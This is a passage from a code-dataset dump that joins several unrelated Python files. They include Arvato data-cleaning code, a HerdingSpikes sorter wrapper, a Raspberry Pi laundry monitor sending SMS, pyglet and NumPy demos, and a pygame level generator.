df:pd.DataFrame) ->pd.DataFrame:\n \"\"\"\n handles the errors fo columns 18 and 19 of dtype float that contain two 18,19 \n \"\"\"\n cols_to_fix = {'CAMEO_DEUG_2015':'X', 'CAMEO_INTL_2015':'XX'}\n\n print(f'fixing load errors {cols_to_fix}')\n\n for col, val in cols_to_fix.items():\n n = df.loc[df[col] == val].shape[0]\n df.loc[df[col] == val, col] = np.NaN\n df.loc[:,col] = df.loc[:,col].astype('float')\n\n print(f'fixed column {col} - records fixed: {n}')\n \n return df\n\n\n def __drop_columns(self, df:pd.DataFrame, columns_to_drop:list=None)->pd.DataFrame:\n \"\"\"\n Description\n -----------\n \n LP_STATUS_GROB: drop this as LP_STATUS_FEIN contains the same information more detailed\n LP_FAMILIE_GROB : analogue to LP_STATUS_GROB\n D19_VERSAND_ANZ_24: drop\n EINGEFUEGT_AM : just timestamp information when the record has been created\n LP_LEBENSPHASE_FEIN: drop - we keep just LP_LEBENSPHASE_GROB\n\n \"\"\"\n # if columns to drop have been defined then use them \n # else execute the default cleaning \n if columns_to_drop: \n cols_to_drop = columns_to_drop\n else:\n # default set of columns to drop\n cols_to_drop = ['EINGEFUEGT_AM']\n \n # drop because of very high correlation to other columns (>=0.9).\n cols_toomuchcorrelation = ['CAMEO_DEU_2015','LP_STATUS_GROB','LP_FAMILIE_GROB','D19_VERSAND_ANZ_24','LP_LEBENSPHASE_FEIN', \n 'ANZ_STATISTISCHE_HAUSHALTE', 'CAMEO_INTL_2015', 'D19_VERSAND_ONLINE_DATUM', 'KBA13_HALTER_66',\n 'KBA13_HERST_SONST', #'LP_LEBENSPHASE_GROB'\n 'PLZ8_BAUMAX', 'PLZ8_GBZ', 'PLZ8_HHZ',\n 'D19_GESAMT_ANZ_24', 'D19_VERSAND_ANZ_12', 'D19_VERSAND_DATUM', 'KBA05_KRSHERST2', \n 'KBA05_KRSHERST3', 'KBA05_SEG9', 'KBA13_KMH_211', 'PLZ8_ANTG1', 'PLZ8_ANTG3']\n \n \n # drop because of too many NULL values (>30%) \n cols_toomanynulls = ['ALTER_KIND4', 'TITEL_KZ', 'ALTER_KIND3', 'ALTER_KIND2', 'ALTER_KIND1', \n 'AGER_TYP', 'EXTSEL992', 'KK_KUNDENTYP', 'KBA05_BAUMAX', 'ALTER_HH','D19_LETZTER_KAUF_BRANCHE']\n \n #\n # columns if threshold is 25% \n #\n # 
['EXTSEL992','KK_KUNDENTYP', 'ALTERSKATEGORIE_FEIN', \n #'D19_LETZTER_KAUF_BRANCHE','D19_GESAMT_ONLINE_QUOTE_12', 'D19_SOZIALES', 'D19_LOTTO','D19_KONSUMTYP', \n # 'D19_VERSAND_ONLINE_QUOTE_12','D19_TELKO_ONLINE_QUOTE_12', 'D19_VERSI_ONLINE_QUOTE_12', 'D19_BANKEN_ONLINE_QUOTE_12',\n #'ALTER_HH', 'KBA05_BAUMAX', 'AGER_TYP', 'TITEL_KZ'] \n \n cols_to_drop = cols_to_drop + cols_toomuchcorrelation + cols_toomanynulls\n\n print(f'dropping columns: {cols_to_drop}') \n\n try:\n df.drop(labels=cols_to_drop, axis=1, inplace=True) \n except KeyError as ex_keyerror:\n print(f'CATCHED EXCEPTION: KeyError: you tried to drop non existing columns: {cols_to_drop}')\n print(f'Failed columns: {ex_keyerror.args}')\n\n return df \n\n def __catvars_to_dummies(self, df:pd.DataFrame)->pd.DataFrame:\n \"\"\"\n Description\n -----------\n\n handles categorical variables. This will generate one hot encodings for the defined columns\n \"\"\"\n #'CAMEO_DEU_2015' will be dropped - ignore this\n # D19_LETZTER_KAUF_BRANCHE-> will be deleted \n cat_cols = []\n\n print('creating one hot encoding columns for: ')\n for col in cat_cols:\n print(f'\\t{col}')\n\n if cat_cols:\n # create one hot encodings using pandas get_dummies function\n df_dummies = pd.get_dummies(df[cat_cols], prefix=cat_cols, drop_first=True).astype('int64')\n df = pd.concat([df, df_dummies], axis=1)\n\n # drop original columns\n df.drop(cat_cols, axis=1, inplace=True) \n\n return df\n\n def __catvars_to_binary(self, df:pd.DataFrame)->pd.DataFrame:\n \"\"\"\n Description\n -----------\n\n \"\"\"\n cat_cols = {'OST_WEST_KZ':{'W':0,'O':1}}\n\n print('convert to binary: ')\n for col, dict_map in cat_cols.items():\n print(f'\\tcolumn: {col} - Mapping: {dict_map}')\n df.loc[:,col] = df.loc[:,col].map(dict_map)\n\n return df\n\n\n\n def __mark_nans(self, df:pd.DataFrame)->pd.DataFrame:\n \"\"\"\n Description\n -----------\n\n replaces all unkown values by np.NAN so that the pandas NAN functions can be used.\n\n Parameters\n 
----------\n\n df : pd.DataFrame\n pandas DataFrame that is to be cleaned. Frame is expected to have columns as AZDIAS or CUSTOMERS \n \"\"\" \n\n print('replace unkown values by NaNs: ') \n unknown_val_set = self.df_metadata.copy()\n \n # select all row that contain the term \"unknown\" \n unknown_val_set = unknown_val_set[(unknown_val_set['Meaning'].str.contains('unknown'))]\n unknown_val_set['value_list'] = unknown_val_set['Value'].str.split(',')\n \n #with progressbar.ProgressBar(max_value=unknown_val_set.index.shape[0]) as bar:\n cnt = 0\n max_value=unknown_val_set.index.shape[0]\n for idx in unknown_val_set.index:\n col = unknown_val_set.loc[idx,'Attribute']\n vals = unknown_val_set.loc[idx,'value_list']\n # str convert to integers\n vals = list(map(int,vals))\n if col in df:\n df.loc[df[col].isin(vals),col] = np.NaN\n\n cnt += 1\n if (cnt == max_value) or (cnt % (max_value // 10)==0):\n print(f'\\tProcessed columns\\r{cnt:4} of {max_value}', end='\\r')\n \n \n #fix CAMEO_DEU_2015 XX will be dropped\n df.loc[df['CAMEO_DEU_2015']=='XX','CAMEO_DEU_2015'] = np.NaN\n print()\n \n # fix for LP_LEBENSPHASE_GROB','LP_FAMILIE_FEIN => 0 is not described. We handle it as unknown == missing\n cols = ['LP_LEBENSPHASE_GROB','LP_FAMILIE_FEIN','GEBURTSJAHR']\n print(f'replace 0 by NaNs for : {cols}')\n df.replace({'LP_LEBENSPHASE_GROB':0 ,'LP_FAMILIE_FEIN':0, 'GEBURTSJAHR':0}, np.NaN, inplace=True)\n \n return df\n \n def __build_features_chidren(self, df:pd.DataFrame, drop_childcols:bool = True)->pd.DataFrame:\n \"\"\"\n Description\n -----------\n \n This function will build some features based on the given input data\n\n * Children and Teens: \n * Children:= number of children younger or equal than 10\n * Teens := number of children older or equal than 10\n\n Parameters\n ----------\n df : pd.DataFrame\n pandas DataFrame that is to be cleaned. 
Frame is expected to have columns as AZDIAS or CUSTOMERS \n \"\"\"\n \n # num of children > 0\n df['d_HAS_CHILDREN'] = 0\n # younger than or equal 10\n df['d_HAS_CHILDREN_YTE10'] = 0\n\n df.loc[df['ANZ_KINDER'] > 0, 'd_HAS_CHILDREN'] = 1\n\n # mask to filter rows that have at least one record\n mask = df[['ALTER_KIND1','ALTER_KIND2','ALTER_KIND3','ALTER_KIND4']].max(axis=1) < 11\n df.loc[mask, 'd_HAS_CHILDREN_YTE10'] = 1\n \n child_cols = ['ANZ_KINDER','ALTER_KIND1','ALTER_KIND2','ALTER_KIND3','ALTER_KIND4']\n \n if drop_childcols:\n df.drop(child_cols, axis='columns', inplace=True)\n \n return df\n \n\n\n def __calc_children_features(self, s):\n \"\"\"\n Description\n -----------\n uses features 'ALTER_KIND1','ALTER_KIND2','ALTER_KIND3','ALTER_KIND4', 'ANZ_KINDER' to reduce them to \n 'd_HAS_CHILDREN', 'd_HAS_CHILDREN_YTE10'\n\n\n * d_HAS_CHILDREN_YTE10 if person has children ANZ_KINDER>0\n * d_HAS_CHILDREN if person has at least one children <= 10 \n\n Parameters\n ----------\n s : pd.Series\n series of a particular DataFrame row containing at least these columns\n 'ALTER_KIND1','ALTER_KIND2','ALTER_KIND3','ALTER_KIND4', 'ANZ_KINDER', 'd_HAS_CHILDREN', 'd_HAS_CHILDREN_YTE10'\n \"\"\" \n yte_10 = (s[['ALTER_KIND1','ALTER_KIND2','ALTER_KIND3','ALTER_KIND4']] <= 10).sum()\n \n\n s['d_HAS_CHILDREN'] = s['ANZ_KINDER']>0\n s['d_HAS_CHILDREN_YTE10'] = yte_10>0\n \n return s\n\n def __calc_child_and_teens(self, s):\n \"\"\"\n Description\n -----------\n\n counts the number of children less 10 and greater equal than 10. I assume that for more than 5 children\n all children > 4 are older than 10. 
Based on the analysis this is in general true\n\n Parameters\n ----------\n s : pd.Series\n series of a particular DataFrame row containing at least these columns\n 'ALTER_KIND1','ALTER_KIND2','ALTER_KIND3','ALTER_KIND4', 'ANZ_KINDER', 'd_NUM_CHILDREN_LESS_10', 'd_NUM_CHILDREN_GTE_10'\n \"\"\" \n less_10 = (s[['ALTER_KIND1','ALTER_KIND2','ALTER_KIND3','ALTER_KIND4']] < 10).sum()\n gte_10 = s['ANZ_KINDER'] - less_10\n\n s['d_NUM_CHILDREN_LESS_10'] = less_10\n s['d_NUM_CHILDREN_GTE_10'] = gte_10\n \n return s\n\n\n \n \n \n \n\nclass FeatureBuilder:\n \"\"\"\n Description\n -----------\n\n executes some data transformations on a arvato dataset and creates some new features\n \"\"\"\n \n def __init__(self):\n pass\n\n def transform(self, df:pd.DataFrame)->pd.DataFrame:\n \"\"\"\n Description\n -----------\n\n executes the data transformation \n\n Parameters\n ----------\n df : pd.DataFrame\n pandas DataFrame that is to be cleaned. Frame is expected to have columns as AZDIAS or CUSTOMERS \n\n\n \"\"\"\n self.__build_features_chidren(df)\n\n return df\n \n def fit (self, df:pd.DataFrame)->pd.DataFrame:\n \"\"\"\n Description\n -----------\n \n prepare data for transformation\n \"\"\"\n pass\n\n def __build_features_chidren(self, df:pd.DataFrame, drop_childcols:bool = True)->pd.DataFrame:\n \"\"\"\n Description\n -----------\n \n This function will build some features based on the given input data\n\n * Children and Teens: \n * Children:= number of children younger or equal than 10\n * Teens := number of children older or equal than 10\n\n Parameters\n ----------\n df : pd.DataFrame\n pandas DataFrame that is to be cleaned. 
Frame is expected to have columns as AZDIAS or CUSTOMERS \n \"\"\"\n \n # num of children > 0\n df['d_HAS_CHILDREN'] = 0\n # younger than or equal 10\n df['d_HAS_CHILDREN_YTE10'] = 0\n\n df.loc[df['ANZ_KINDER'] > 0, 'd_HAS_CHILDREN'] = 1\n\n # mask to filter rows that have at least one record\n mask = df[['ALTER_KIND1','ALTER_KIND2','ALTER_KIND3','ALTER_KIND4']].max(axis=1) < 11\n df.loc[mask, 'd_HAS_CHILDREN_YTE10'] = 1\n \n child_cols = ['ANZ_KINDER','ALTER_KIND1','ALTER_KIND2','ALTER_KIND3','ALTER_KIND4']\n \n if drop_childcols:\n df.drop(child_cols, axis='columns', inplace=True)\n \n return df\n \n\n\n def __calc_children_features(self, s):\n \"\"\"\n Description\n -----------\n uses features 'ALTER_KIND1','ALTER_KIND2','ALTER_KIND3','ALTER_KIND4', 'ANZ_KINDER' to reduce them to \n 'd_HAS_CHILDREN', 'd_HAS_CHILDREN_YTE10'\n\n\n * d_HAS_CHILDREN_YTE10 if person has children ANZ_KINDER>0\n * d_HAS_CHILDREN if person has at least one children <= 10 \n\n Parameters\n ----------\n s : pd.Series\n series of a particular DataFrame row containing at least these columns\n 'ALTER_KIND1','ALTER_KIND2','ALTER_KIND3','ALTER_KIND4', 'ANZ_KINDER', 'd_HAS_CHILDREN', 'd_HAS_CHILDREN_YTE10'\n \"\"\" \n yte_10 = (s[['ALTER_KIND1','ALTER_KIND2','ALTER_KIND3','ALTER_KIND4']] <= 10).sum()\n \n\n s['d_HAS_CHILDREN'] = s['ANZ_KINDER']>0\n s['d_HAS_CHILDREN_YTE10'] = yte_10>0\n \n return s\n\n def __calc_child_and_teens(self, s):\n \"\"\"\n Description\n -----------\n\n counts the number of children less 10 and greater equal than 10. I assume that for more than 5 children\n all children > 4 are older than 10. 
Based on the analysis this is in general true\n\n Parameters\n ----------\n s : pd.Series\n series of a particular DataFrame row containing at least these columns\n 'ALTER_KIND1','ALTER_KIND2','ALTER_KIND3','ALTER_KIND4', 'ANZ_KINDER', 'd_NUM_CHILDREN_LESS_10', 'd_NUM_CHILDREN_GTE_10'\n \"\"\" \n less_10 = (s[['ALTER_KIND1','ALTER_KIND2','ALTER_KIND3','ALTER_KIND4']] < 10).sum()\n gte_10 = s['ANZ_KINDER'] - less_10\n\n s['d_NUM_CHILDREN_LESS_10'] = less_10\n s['d_NUM_CHILDREN_GTE_10'] = gte_10\n \n return s\n ","sub_path":"python/etl/processor.py","file_name":"processor.py","file_ext":"py","file_size_in_byte":17210,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"80283950","text":"from pathlib import Path\nimport copy\n\nimport spikeextractors as se\nimport spiketoolkit as st\n\nfrom ..basesorter import BaseSorter\nfrom ..sorter_tools import recover_recording\n\ntry:\n import herdingspikes as hs\n HAVE_HS = True\nexcept ImportError:\n HAVE_HS = False\n\n\nclass HerdingspikesSorter(BaseSorter):\n \"\"\"\n HerdingSpikes is a sorter based on estimated spike location, developed by\n researchers at the University of Edinburgh. It's a fast and scalable choice.\n\n See: HILGEN, Gerrit, et al. Unsupervised spike sorting for large-scale,\n high-density multielectrode arrays. 
Cell reports, 2017, 18.10: 2521-2532.\n \"\"\"\n\n sorter_name = 'herdingspikes'\n installed = HAVE_HS\n requires_locations = True\n _default_params = None # later\n compatible_with_parallel = {'loky': True, 'multiprocessing': True, 'threading': False}\n\n installation_mesg = \"\"\"\n More information on HerdingSpikes at:\n * https://github.com/mhhennig/hs2\n \"\"\"\n\n def __init__(self, **kargs):\n BaseSorter.__init__(self, **kargs)\n \n @staticmethod\n def get_sorter_version():\n return hs.__version__\n\n def _setup_recording(self, recording, output_folder):\n \n p = self.params\n\n # Bandpass filter\n if p['filter'] and p['freq_min'] is not None and p['freq_max'] is not None:\n recording = st.preprocessing.bandpass_filter(\n recording=recording, freq_min=p['freq_min'], freq_max=p['freq_max'])\n\n if p['pre_scale']:\n recording = st.preprocessing.normalize_by_quantile(\n recording = recording, scale=p['pre_scale_value'],\n median=0.0, q1=0.05, q2=0.95\n )\n\n # this should have its name changed\n self.Probe = hs.probe.RecordingExtractor(\n recording,\n masked_channels=p['probe_masked_channels'],\n inner_radius=p['probe_inner_radius'],\n neighbor_radius=p['probe_neighbor_radius'],\n event_length=p['probe_event_length'],\n peak_jitter=p['probe_peak_jitter'])\n\n def _run(self, recording, output_folder):\n recording = recover_recording(recording)\n p = self.params\n\n if recording.is_filtered and p['filter']:\n print(\"Warning! The recording is already filtered, but Herding Spikes filter is enabled. 
You can disable \"\n \"filters by setting 'filter' parameter to False\")\n\n self.H = hs.HSDetection(\n self.Probe, file_directory_name=str(output_folder),\n left_cutout_time=p['left_cutout_time'],\n right_cutout_time=p['right_cutout_time'],\n threshold=p['detection_threshold'],\n to_localize=True,\n num_com_centers=p['num_com_centers'],\n maa=p['maa'],\n ahpthr=p['ahpthr'],\n out_file_name=p['out_file_name'],\n decay_filtering=p['decay_filtering'],\n save_all=p['save_all'],\n amp_evaluation_time=p['amp_evaluation_time'],\n spk_evaluation_time=p['spk_evaluation_time']\n )\n\n self.H.DetectFromRaw(load=True, tInc=100000)\n\n sorted_file = str(output_folder / 'HS2_sorted.hdf5')\n if(not self.H.spikes.empty):\n self.C = hs.HSClustering(self.H)\n self.C.ShapePCA(pca_ncomponents=p['pca_ncomponents'],\n pca_whiten=p['pca_whiten'])\n self.C.CombinedClustering(\n alpha=p['clustering_alpha'],\n cluster_subset=p['clustering_subset'],\n bandwidth=p['clustering_bandwidth'],\n bin_seeding=p['clustering_bin_seeding'],\n n_jobs=p['clustering_n_jobs'],\n min_bin_freq=p['clustering_min_bin_freq']\n )\n else:\n self.C = hs.HSClustering(self.H)\n\n if p['filter_duplicates']:\n uids = self.C.spikes.cl.unique()\n for u in uids:\n s = self.C.spikes[self.C.spikes.cl==u].t.diff()= 0x8000):\n return -((65535 - val) + 1)\n else:\n return val\n\n#Ensure that SPI is enabled on RPi\nbus = smbus.SMBus(1)\n\n# This is the address value read via the i2cdetect command\naddress = 0x68\n\n# Wake the Accelerometer MP6050 up as it starts in sleep mode\nbus.write_byte_data(address, power_mgmt_1, 0)\n\n\n\n# Get status of accelerometer\n\ndef get_accel_status(accel_list):\n # Read accelerometer data on the x-axis every second\n accel_xout = read_word_2c(0x3b) \n \n # Append new reading to the accelerometer list containing 5 values\n accel_list.append(accel_xout) \n \n # Delete the first value in the accelerometer list\n # This procedure updates the list every second \n del accel_list[0] \n \n # To check 
list of output values of accelerometer\n print(\"Accel List: \", accel_list)\n \n # Calculate the standard deviation\n std_dev=stdev(accel_list)\n \n # To check standard deviation of the values in the list\n print(\"Standard Deviation: \", std_dev)\n \n # Determine whether the washer is vibrating or not according to the\n # standard deviation of the list.\n # This value must be calibrated according to the surface and amount of \n # vibrating the accelerometer is subjected to.\n # Read documentation for calibration procedures.\n if std_dev<800:\n print(\"Not Vibrating\")\n vibrate = False\n else:\n print(\"Vibrating\")\n vibrate = True\n return vibrate\n\n\n\n# Get status of door\n \ndef get_door_status():\n # Door closed\n if GPIO.input(21) == GPIO.LOW: \n print(\"Closed\")\n door = True \n \n # Door opened\n if GPIO.input(21) == GPIO.HIGH: \n print(\"Opened\")\n door = False\n return door\n\n\n\n# State Machine\nclass Washing_Machine(sm.SM):\n \n # Initialising\n \n def __init__(self):\n self.start_state = 0\n self.details = ''\n self.name = ''\n self.scanned = False\n self.client = Client(account_sid, auth_token) \n # Create an object of the class MFRC522\n self.MIFAREReader = mfrc522.MFRC522()\n\n\n\n # Updating states according to input\n \n def get_next_values(self, state, inp):\n \n # State 0 and RFID card has not been scanned \n if state == 0 and not self.scanned:\n # Scan for RFID cards\n self.rfid_scanning()\n output = \"Available\"\n \n # Dictionary of door, accelerometer and RFID status\n to_check = {'door': inp[0], 'vibrate' : inp[1], 'scanned' : self.scanned}\n \n # State 0\n if state == 0:\n # Check that door closed, machine is vibrating and RFID card\n # has been scanned.\n if all(to_check.values()):\n next_state = 1\n output = \"Not Available\" \n else: \n next_state = 0\n output = \"Available\"\n \n # State 1\n elif state == 1: \n # Check if washer is still vibrating \n if to_check['vibrate']: \n next_state = 1\n output = \"Not Available\"\n else: 
\n next_state = 2 \n output = \"Not Available\"\n # Send SMS\n self.rfid_sms()\n \n # State 2\n else: \n # Check if door is still closed\n if to_check['door']: \n next_state = 2\n output = \"Not Available\" \n else: \n # Return to initial state \n next_state = 0 \n output = \"Available\"\n self.scanned = False\n \n assert(next_state in (0,1,2))\n return next_state, output\n\n\n\n # Check for any RFID cards scanned\n \n def rfid_scanning(self): \n # Welcome message\n print(\"Looking for cards\")\n print(\"Press Ctrl-C to stop.\")\n \n # Scan for cards\n (status,TagType) = self.MIFAREReader.MFRC522_Request(self.MIFAREReader.PICC_REQIDL)\n \n # Get the UID of the card\n (status,uid) = self.MIFAREReader.MFRC522_Anticoll()\n \n # If we have the UID, continue\n if status == self.MIFAREReader.MI_OK:\n\n # Print UID\n print(\"UID: \"+str(uid[0])+\",\"+str(uid[1])+\",\"+str(uid[2])+\",\"+str(uid[3]))\n user_uid = str(uid[0])+\",\"+str(uid[1])+\",\"+str(uid[2])+\",\"+str(uid[3])\n time.sleep(2)\n \n # Check that user is in the student database\n try:\n # Retrieve user name\n self.name = user_dict[user_uid]['Name']\n print(\"Name: \", self.name)\n \n # Retrieve user phone number\n self.details = user_dict[user_uid]['HP']\n print(\"Phone Number:\", self.details)\n \n # Update RFID status\n self.scanned = True\n \n except:\n print(\"No such user found\") \n\n\n \n # Send SMS to user\n \n def rfid_sms(self):\n message = self.client.messages.create(\n to=self.details,\n from_=sender_number,\n body= \"Hi \" + self.name + \", your laundry is ready!\")\n print(message)\n\n\n\n# Main Code\ndef main():\n #GPIO Settings\n # Use the BCM GPIO numbers as the numbering scheme.\n GPIO.setmode(GPIO.BCM)\n\n # Set GPIO 21 as input with pull-down resistor.\n GPIO.setup(21, GPIO.IN, GPIO.PUD_DOWN)\n \n # Create an object of the class Washing_Machine\n wm=Washing_Machine()\n wm.start()\n \n # Initial accelerometer list which should be changed during calibration.\n # Read documentation for 
calibration procedures.\n accel_list=[-1828, -1936, -1944, -1904, -1912]\n \n while True:\n # Retrieve boolean status of door\n door=get_door_status()\n \n # Retrieve boolean status of accelerometer\n vibrate=get_accel_status(accel_list)\n \n # Input both door and accelerometer status into state machine\n inp=(door, vibrate)\n wm.step(inp)\n \n # Update availability on firebase based on output of state machine\n availability_db.child(\"Washer 2\").set(wm.step(inp))\n\nif __name__ == '__main__':\n main()\n","sub_path":"Washer_2.py","file_name":"Washer_2.py","file_ext":"py","file_size_in_byte":8094,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"12697551","text":"\n'''\n\n\tProject:\tCS100\n\tTitle:\t\tScenePrimitives\n\n\tAuthor:\t\tJohn Mooney\n\tDate:\t\t1/23/2013\n\n\tDescription:\n\t\tEntry point for running a debug CS100 version\n'''\n\n# Imports\nimport pyglet\nimport sys\nimport os\n\nfrom pyglet.graphics import GL_LINES\n\n\n'''\t\tSet Search Directory\t'''\nfor root, direcs, files in os.walk(os.getcwd()):\n\tfor direc in direcs:\n\t\tsys.path.append(os.path.join(root, direc))\n\n\n# Imports\nimport Color\n\nfrom Renderer import Renderer\nfrom TransformationGraph import Transform\nfrom ResourceManager import ResourceManager\n\nfrom Animation import Animation\nfrom Sprite import Sprite\n\n#-------------------------------------------------------#\t\n\nwindow \t\t\t= pyglet.window.Window(800, 600)\nwinDimensions \t= [800, 600]\n\nrendMan = Renderer(winSize=winDimensions)\nRenderer.activeRenderer = rendMan\n\nsg = rendMan.getSceneGraph()\n\nrm = ResourceManager(\"Tests\\\\data\")\nResourceManager.activeManager = rm\nrm.registerExtension(\".jpg\", \"img\", [\"img\"], pyglet.image.load)\nrm.registerExtension(\".bmp\", \"img\", [\"img\"], pyglet.image.load)\nrm.registerExtension(\".png\", \"img\", [\"img\"], pyglet.image.load)\nrm.registerExtension(\".anim\", \"anim\", [\"anim\"], Animation)\n\nim = 
rm.request(\"C:/Users/John/Pictures/Lake.jpg\")\n\nsp = pyglet.sprite.Sprite(im)\nsp2 = Sprite(im, t=sg.newTransform())\n\npyglet.gl.glClearColor(1,0,1,0);\ndef update(dt):\n\tpass\n\t\n\t\n@window.event\ndef on_draw():\n\twindow.clear()\n\trendMan.render()\n\tsp.draw()\n\npyglet.clock.schedule(update)\npyglet.app.run()\n\n","sub_path":"py ref/pyglet/CS100-master/Tests/SpriteTest.py","file_name":"SpriteTest.py","file_ext":"py","file_size_in_byte":1454,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"321355737","text":"#!/usr/bin/env python\n#coding:utf-8\nimport sys,re,os,argparse,fileinput\n\nparser = argparse.ArgumentParser(description=\"This Script is used to find all deg.pro-pro.txt, Co-Expression.xls, filter.coexpression.txt, and filter.propro.txt under a given path, and add the symbol from anno file. New file will replace the old file, old file will be renamed with '.no.symbol.txt' extension.\")\nparser.add_argument(\"-path\",\"--path\",type=str,help=\"The input path, 'deg.pro-pro.txt','Co-Expression.xls','filter.coexpression.txt','filter.propro.txt' file will be found under this path.\",required = True)\nparser.add_argument(\"-anno\",\"--anno\",type=str,help=\"The input anno file, first column must be id, seventh column must be symbol information.\",required = True)\nparser.add_argument(\"-v\",\"--version\",action=\"version\",version='%(prog)s 1.0')\nargs = parser.parse_args()\n\nfile_list = os.popen('find ' + args.path + \" -name deg.pro-pro.txt -o -name Co-Expression.xls -o -name filter.coexpression.txt -o -name filter.propro.txt\").read().rstrip(\"\\n\").split(\"\\n\")\nanno_d = {}\nwith open(args.anno,\"r\") as anno:\n for i in anno:\n anno_d[i.split(\"\\t\")[0]] = i.split(\"\\t\")[6]\n# anno_d[\"-\"] = \"-\"\nfor i in fileinput.input(file_list,backup = \".no.symbol.txt\",inplace = 1):\n t = re.sub('\\(-\\)?',\"(-:-)\",i)\n ensembol = re.findall('\\S+\\((.+?)\\)\\s+?',t)\n if ensembol:\n for ei in 
ensembol:\n if ei == \"-:-\":\n continue\n else:\n eii = ei.split(\",\")\n for index,eiii in enumerate(eii):\n eii[index] = eiii + \":\" + anno_d[eiii]\n an = \";\".join(eii)\n t = re.sub(ei,an,t,1)\n sys.stdout.write(t)\n else:\n a = i.split(\"\\t\")\n for n,ai in enumerate(a):\n if anno_d.has_key(ai):\n a[n] = ai + \"(\" + anno_d[ai] + \")\"\n sys.stdout.write(\"\\t\".join(a))\n\n \n","sub_path":"add_coex_and_pro_symbol.py","file_name":"add_coex_and_pro_symbol.py","file_ext":"py","file_size_in_byte":1904,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"622923781","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n# 2019-03-12 Guolikai\n# 功能: 使用科学计算库NumPy简化程序\nfrom matplotlib import pyplot as plt\nimport numpy as np\n\n\n# 解决中文显示问题\nplt.rcParams['font.sans-serif'] = ['SimHei']\nplt.rcParams['axes.unicode_minus'] = False\n\ndef demo():\n # 生成1-99数组\n arr_1 = np.arange(1,100)\n print(arr_1)\n # s生成随机数是2-12的20列10行矩阵\n arr = np.random.randint(2,13,(10,20))\n print(arr)\n\n # 改变数组形状\n arr1 = np.reshape(arr,(8,25))\n print(arr1)\n\n\ndef main():\n \"\"\"\n 直方图绘制: plt.hist(data,bins) data,数据列表;bins:分组边界\n edgecolor: 边界颜色\n linewidth: 边界线宽度\n rwidth: 直方图宽度\n density: 概率统计(老版本normed)\n \"\"\"\n total_num = 10000\n arr_a = np.random.randint(1, 7, total_num)\n arr_b = np.random.randint(1, 7, total_num)\n # numpy数据运算,即向量化运算\n arr = arr_a + arr_b\n # print('第一个数组:{}'.format(arr_a))\n # print('第二个数组:{}'.format(arr_b))\n # print('二个数组和:{}'.format(arr))\n # print('二个数组相乘:{}'.format(arr_a * arr_b))\n\n # 直接生产直方图的统计具体数据\n hist, bins = np.histogram(arr,bins=range(2, 14))\n print(hist)\n print(bins)\n # 数据可视化\n # X轴加单位,设置x轴坐标点显示\n tick_labels = ['2点', '3点', '4点', '5点', '6点', '7点', '8点', '9点', '10点', '11点', '12点']\n tick_pos = np.arange(2, 13) + 0.5 #生成位置并修改\n plt.xticks(tick_pos, tick_labels)\n plt.title('骰子点数统计')\n plt.xlabel('点数')\n plt.ylabel('统计数量')\n plt.hist(arr, bins=range(2, 14), density=0, edgecolor='black', 
linewidth=1, rwidth=0.8)\n plt.show()\n\n\nif __name__ == '__main__':\n demo()\n # main()\n","sub_path":"demo_numpy.py","file_name":"demo_numpy.py","file_ext":"py","file_size_in_byte":1887,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"149668012","text":"import os\nimport random\nimport pygame\nimport sys\npygame.init()\npygame.font.init()\n\nFPS = 50\nWIDTH = 500\nHEIGHT = 500\nSTEP = 10\nTILE_WIDTH = TILE_HEIGHT = 50\nGRAVITY = 10\n\n\n\nscreen = pygame.display.set_mode((WIDTH, HEIGHT))\nclock = pygame.time.Clock()\n\nall_sprites = pygame.sprite.Group()\ntiles_group = pygame.sprite.Group()\nplayer_group = pygame.sprite.Group()\nbox_group = pygame.sprite.Group()\nmoney_group = pygame.sprite.Group()\nbox_black_group = pygame.sprite.Group()\nnps_group = pygame.sprite.Group()\nstar_group = pygame.sprite.Group()\nscreen_rect = (0, 0, WIDTH, HEIGHT)\n\n\n\ndef load_image(name, colorkey=None):\n fullname = os.path.join('data', name)\n try:\n image = pygame.image.load(fullname)\n except pygame.error as message:\n print('Cannot load image:', name)\n raise SystemExit(message)\n\n if colorkey is not None:\n if colorkey is -1:\n colorkey = image.get_at((0, 0))\n image.set_colorkey(colorkey)\n return image\n\ndef terminate():\n pygame.quit()\n sys.exit()\n\ndef start_screen():\n intro_text = [\"ЗАСТАВКА\", \"\",\n \"Правила игры\",\n \"Если в правилах несколько строк,\",\n \"приходится выводить их построчно\"]\n fon = pygame.transform.scale(load_image('fon.jpg'), (WIDTH, HEIGHT))\n screen.blit(fon, (0, 0))\n font = pygame.font.Font(\"freesansbold.ttf\", 30)\n text_coord = 50\n for line in intro_text:\n string_rendered = font.render(line, 1, pygame.Color('black'))\n intro_rect = string_rendered.get_rect()\n text_coord += 10\n intro_rect.top = text_coord\n intro_rect.x = 10\n text_coord += intro_rect.height\n screen.blit(string_rendered, intro_rect)\n\n while True:\n for event in pygame.event.get():\n if event.type == 
pygame.QUIT:\n terminate()\n elif event.type == pygame.KEYDOWN or event.type == pygame.MOUSEBUTTONDOWN:\n return # начинаем игру\n pygame.display.flip()\n clock.tick(FPS)\n\n\na = [['' for i in range(100)] for j in range(100)]\n\nprint(a)\nfor i in range(100):\n for j in range(100):\n chance = random.randint(0, 100)\n if chance < 20:\n a[i][j] = '#'\n else:\n a[i][j] = '.'\n\nfor i in range(100):\n a[0][i] = '$'\n a[99][i] = '$'\n a[i][0] = '$'\n a[i][99] = '$'\n\ni = 0\nwhile i < 50:\n chance2 = random.randint(0, 100)\n if chance2 < 50:\n x, y = random.randint(2, 97), random.randint(2, 97)\n while a[x][y] == '#' and a[x][y] != '@' and a[x][y] != '$' and a[x][y] != '?':\n x, y = random.randint(2, 97), random.randint(2, 97)\n a[x][y] = '*'\n i += 1\n\n\n\nprint(a)\nx, y = random.randint(0, 100), random.randint(0, 100)\nwhile a[x][y] == '#':\n x, y = random.randint(0, 100), random.randint(0, 100)\na[x][y] = '@'\ncash_m = []\n\ndef generate_level(level):\n new_player = None\n for y in range(len(level)):\n for x in range(len(level[y])):\n if level[y][x] == '.':\n Tile('empty', x, y)\n elif level[y][x] == '#':\n Tile('wall', x, y)\n elif level[y][x] == '@':\n 